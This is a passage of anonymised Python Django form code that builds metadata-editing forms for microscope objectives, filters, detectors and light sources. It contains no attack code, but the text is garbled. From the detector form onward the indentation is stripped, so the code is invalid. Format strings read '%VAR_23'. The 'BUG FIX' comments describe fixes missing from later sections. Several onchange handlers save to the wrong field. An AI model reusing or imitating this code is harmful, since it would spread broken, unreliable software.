                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "medium",
                                VAR_7=True,
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["medium"])
        except Exception:
            self.fields["medium"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["medium"])
        # Refractive index: free-text field with the same fallback scheme.
        try:
            if VAR_12["initial"]["objectiveSettings"].refractiveIndex is not None:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "refractiveIndex",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objectiveSettings"].refractiveIndex,
                    label="Refractive index",
                    required=False,
                )
            else:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "refractiveIndex",
                            ),
                        }
                    ),
                    label="Refractive index",
                    required=False,
                )
            FUNC_1(self.fields["refractiveIndex"])
        except Exception:
            self.fields["refractiveIndex"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Refractive index",
                required=False,
            )
            FUNC_1(self.fields["refractiveIndex"])
        # Display order: inherited objective fields, then settings fields.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
            "correctionCollar",
            "medium",
            "refractiveIndex",
        ]
class CLASS_17(forms.Form):
    """Form for editing Filter metadata: manufacturer, model, serial and
    lot numbers, filter wheel, filter type, and the transmittance-range
    values (cut in/out, tolerances, transmittance).

    Fields come from ``kwargs["initial"]["filter"]``; each field is built
    inside try/except so missing data degrades to an "N/A" CharField.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_17, self).__init__(*VAR_11, **VAR_12)

        # Manufacturer
        try:
            if VAR_12["initial"]["filter"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])

        # Model
        try:
            if VAR_12["initial"]["filter"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])

        # Serial number
        try:
            if VAR_12["initial"]["filter"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])

        # Lot number
        try:
            if VAR_12["initial"]["filter"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])

        # Filter wheel
        try:
            if VAR_12["initial"]["filter"].filterWheel is not None:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].filterWheel,
                    label="Filter wheel",
                    required=False,
                )
            else:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    label="Filter wheel",
                    required=False,
                )
            FUNC_1(self.fields["filterWheel"])
        except Exception:
            self.fields["filterWheel"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Filter wheel",
                required=False,
            )
            FUNC_1(self.fields["filterWheel"])

        # Filter type: enumeration-backed dropdown.
        try:
            if VAR_12["initial"]["filter"].getFilterType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "type", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].getFilterType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "type", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["type"])

        # Transmittance range; may be None as a whole, so each dependent
        # field checks it first.
        VAR_38 = VAR_12["initial"]["filter"].getTransmittanceRange()

        # Cut in.
        # BUG FIX (here and in the three labels below): "%VAR_23" was not a
        # valid %-conversion and raised at format time, always forcing the
        # "N/A" fallback; "%s" is the intended conversion for the unit
        # symbol.
        try:
            if VAR_38 is not None and VAR_38.cutIn is not None:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"]
                    .getTransmittanceRange()
                    .cutIn.getValue(),
                    label="Cut in (%s)" % VAR_38.cutIn.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    label="Cut in",
                    required=False,
                )
            FUNC_1(self.fields["cutIn"])
        except Exception:
            self.fields["cutIn"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in",
                required=False,
            )
            FUNC_1(self.fields["cutIn"])

        # Cut out
        try:
            if VAR_38 is not None and VAR_38.cutOut is not None:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    initial=VAR_38.cutOut.getValue(),
                    label="Cut out (%s)" % VAR_38.cutOut.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    label="Cut out",
                    required=False,
                )
            FUNC_1(self.fields["cutOut"])
        except Exception:
            self.fields["cutOut"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out",
                required=False,
            )
            FUNC_1(self.fields["cutOut"])

        # Cut in tolerance
        try:
            if VAR_38 is not None and VAR_38.cutInTolerance is not None:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    initial=VAR_38.cutInTolerance.getValue(),
                    label=("Cut in tolerance (%s)" % VAR_38.cutInTolerance.getSymbol()),
                    required=False,
                )
            else:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    label="Cut in tolerance",
                    required=False,
                )
            FUNC_1(self.fields["cutInTolerance"])
        except Exception:
            self.fields["cutInTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in tolerance",
                required=False,
            )
            FUNC_1(self.fields["cutInTolerance"])

        # Cut out tolerance.
        # BUG FIX: the onchange handler previously saved this field under
        # "cutOut" (copy-paste error), clobbering the cut-out value; it
        # must target "cutOutTolerance".
        try:
            if VAR_38 is not None and VAR_38.cutOutTolerance is not None:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    initial=VAR_38.cutOutTolerance.getValue(),
                    label=(
                        "Cut out tolerance (%s)" % VAR_38.cutOutTolerance.getSymbol()
                    ),
                    required=False,
                )
            else:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    label="Cut out tolerance",
                    required=False,
                )
            FUNC_1(self.fields["cutOutTolerance"])
        except Exception:
            self.fields["cutOutTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out tolerance",
                required=False,
            )
            FUNC_1(self.fields["cutOutTolerance"])

        # Transmittance (stored as a fraction; displayed as a percentage).
        try:
            if VAR_12["initial"]["filter"].transmittanceRange is not None:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    initial=formatPercentFraction(
                        VAR_12["initial"]["filter"]
                        .getTransmittanceRange()
                        .transmittance
                    ),
                    label="Transmittance (%)",
                    required=False,
                )
            else:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["transmittance"])
        except Exception:
            self.fields["transmittance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["transmittance"])

        # Display order of the fields in the rendered form.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
            "filterWheel",
            "cutIn",
            "cutOut",
            "cutInTolerance",
            "cutOutTolerance",
            "transmittance",
        ]
class CLASS_18(forms.Form):
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_18, self).__init__(*VAR_11, **VAR_12)
VAR_39 = VAR_12["initial"]["detectorSettings"]
VAR_40 = VAR_12["initial"]["detector"]
try:
if VAR_40 is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "manufacturer"),
}
),
initial=VAR_40.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "manufacturer"),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_40 is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "model"),
}
),
initial=VAR_40.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_40 is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "serialNumber"),
}
),
initial=VAR_40.serialNumber,
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "serialNumber"),
}
),
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_40 is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "lotNumber"),
}
),
initial=VAR_40.lotNumber,
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "lotNumber"),
}
),
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_40.getDetectorType() is not None:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
}
),
initial=VAR_40.getDetectorType().value,
required=False,
)
else:
self.fields["type"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["types"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
}
),
required=False,
)
FUNC_1(self.fields["type"])
except Exception:
self.fields["type"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["type"])
try:
if VAR_39 is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
),
initial=VAR_39.gain,
required=False,
)
elif VAR_40 is not None:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "gain"),
}
),
initial=VAR_40.gain,
required=False,
)
else:
self.fields["gain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
),
required=False,
)
FUNC_1(self.fields["gain"])
except Exception:
self.fields["gain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["gain"])
try:
if VAR_39 is not None and VAR_39.voltage is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "voltage"),
}
),
initial=VAR_39.voltage.getValue(),
label="Voltage (%VAR_23)" % VAR_39.voltage.getSymbol(),
required=False,
)
elif VAR_40 is not None:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
initial=VAR_40.voltage.getValue(),
label="Voltage (%VAR_23)" % VAR_40.voltage.getSymbol(),
required=False,
)
else:
self.fields["voltage"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "voltage"),
}
),
required=False,
)
FUNC_1(self.fields["voltage"])
except Exception:
self.fields["voltage"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["voltage"])
try:
if VAR_39 is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "offsetValue"),
}
),
initial=VAR_39.offsetValue,
label="Offset",
required=False,
)
elif VAR_40 is not None:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "offsetValue"),
}
),
initial=VAR_40.offsetValue,
label="Offset",
required=False,
)
else:
self.fields["offsetValue"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "offsetValue"),
}
),
label="Offset",
required=False,
)
FUNC_1(self.fields["offsetValue"])
except Exception:
self.fields["offsetValue"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Offset",
required=False,
)
FUNC_1(self.fields["offsetValue"])
try:
if VAR_40 is not None:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
initial=VAR_40.zoom,
required=False,
)
else:
self.fields["zoom"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "voltage"),
}
),
required=False,
)
FUNC_1(self.fields["zoom"])
except Exception:
self.fields["zoom"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["zoom"])
try:
if VAR_40 is not None:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "amplificationGain"),
}
),
initial=VAR_40.amplificationGain,
label="Amplification gain",
required=False,
)
else:
self.fields["amplificationGain"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_40.id, "amplificationGain"),
}
),
label="Amplification gain",
required=False,
)
FUNC_1(self.fields["amplificationGain"])
except Exception:
self.fields["amplificationGain"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Amplification gain",
required=False,
)
FUNC_1(self.fields["amplificationGain"])
try:
if VAR_39 is not None and VAR_39.readOutRate is not None:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "readOutRate"),
}
),
initial=VAR_39.readOutRate.getValue(),
label=("Read out rate (%VAR_23)" % VAR_39.readOutRate.getSymbol()),
required=False,
)
else:
self.fields["readOutRate"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_39.id, "readOutRate"),
}
),
label="Read out rate",
required=False,
)
FUNC_1(self.fields["readOutRate"])
except Exception:
self.fields["readOutRate"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Read out rate",
required=False,
)
FUNC_1(self.fields["readOutRate"])
try:
if VAR_39 is not None:
self.fields["binning"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_39.id, "type", VAR_7=True)
}
),
initial=VAR_39.getBinning().value,
required=False,
)
else:
self.fields["binning"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["binnings"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(VAR_39.id, "type", VAR_7=True)
}
),
required=False,
)
FUNC_1(self.fields["binning"])
except Exception:
self.fields["binning"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["binning"])
self.fields.keyOrder = [
"model",
"manufacturer",
"serialNumber",
"lotNumber",
"type",
"gain",
"voltage",
"offsetValue",
"zoom",
"amplificationGain",
"readOutRate",
"binning",
]
class CLASS_19(forms.Form):
VAR_24 = (
("", "---------"),
("True", "True"),
("False", "False"),
)
def __init__(self, *VAR_11, **VAR_12):
super(CLASS_19, self).__init__(*VAR_11, **VAR_12)
VAR_41 = VAR_12["initial"]["lightSource"]
VAR_42 = None
if "lightSourceSettings" in VAR_12["initial"]:
VAR_42 = VAR_12["initial"]["lightSourceSettings"]
self.lightSourceType = VAR_41.OMERO_CLASS
try:
if VAR_41.manufacturer is not None:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
initial=VAR_41.manufacturer,
required=False,
)
else:
self.fields["manufacturer"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["manufacturer"])
except Exception:
self.fields["manufacturer"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["manufacturer"])
try:
if VAR_41.model is not None:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
initial=VAR_41.model,
required=False,
)
else:
self.fields["model"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "model"),
}
),
required=False,
)
FUNC_1(self.fields["model"])
except Exception:
self.fields["model"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["model"])
try:
if VAR_41.serialNumber is not None:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "serialNumber"),
}
),
initial=VAR_41.serialNumber,
label="Serial number",
required=False,
)
else:
self.fields["serialNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "serialNumber"),
}
),
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
except Exception:
self.fields["serialNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Serial number",
required=False,
)
FUNC_1(self.fields["serialNumber"])
try:
if VAR_41.lotNumber is not None:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "lotNumber"),
}
),
initial=VAR_41.lotNumber,
label="Lot number",
required=False,
)
else:
self.fields["lotNumber"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "lotNumber"),
}
),
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
except Exception:
self.fields["lotNumber"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Lot number",
required=False,
)
FUNC_1(self.fields["lotNumber"])
try:
if VAR_41.power is not None:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "power"),
}
),
initial=VAR_41.power.getValue(),
label="Power (%VAR_23)" % VAR_41.power.getSymbol(),
required=False,
)
else:
self.fields["power"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "power"),
}
),
required=False,
)
FUNC_1(self.fields["power"])
except Exception:
self.fields["power"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["power"])
try:
if VAR_41.getLightSourceType() is not None:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "type", VAR_7=True
)
}
),
label="Type",
initial=VAR_41.getLightSourceType().value,
required=False,
)
else:
self.fields["lstype"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["lstypes"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "type", VAR_7=True
)
}
),
label="Type",
required=False,
)
FUNC_1(self.fields["lstype"])
except Exception:
self.fields["lstype"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Type",
required=False,
)
FUNC_1(self.fields["lstype"])
try:
VAR_45 = VAR_41.getPump()
VAR_46 = VAR_45.OMERO_CLASS # E.g. 'Arc'
VAR_47 = VAR_45.getModel()
VAR_48 = "%VAR_23: %s" % (VAR_46, VAR_47)
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial=VAR_48,
required=False,
)
except Exception:
self.fields["pump"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
required=False,
)
FUNC_1(self.fields["pump"])
try:
if VAR_41.getLaserMedium() is not None:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "medium", VAR_7=True
)
}
),
initial=VAR_41.getLaserMedium().value,
label="Medium",
required=False,
)
else:
self.fields["lmedium"] = MetadataModelChoiceField(
queryset=VAR_12["initial"]["mediums"],
empty_label="Not set",
widget=forms.Select(
attrs={
"onchange": FUNC_0(
VAR_41.id, "medium", VAR_7=True
)
}
),
label="Medium",
required=False,
)
FUNC_1(self.fields["lmedium"])
except Exception:
self.fields["lmedium"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
label="Medium",
required=False,
)
FUNC_1(self.fields["lmedium"])
try:
if (
VAR_42 is not None
and VAR_42.wavelength is not None
):
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
initial=VAR_42.wavelength.getValue(),
label=(
"Wavelength (%VAR_23)" % VAR_42.wavelength.getSymbol()
),
required=False,
)
elif VAR_41.wavelength is not None:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
initial=VAR_41.wavelength.getValue(),
label=("Wavelength (%VAR_23)" % VAR_41.wavelength.getSymbol()),
required=False,
)
else:
self.fields["wavelength"] = forms.CharField(
max_length=100,
widget=forms.TextInput(
attrs={
"size": 25,
"onchange": FUNC_0(VAR_41.id, "wavelength"),
}
),
required=False,
)
FUNC_1(self.fields["wavelength"])
except Exception:
self.fields["wavelength"] = forms.CharField(
max_length=10,
widget=forms.TextInput(attrs={"size": 25}),
initial="N/A",
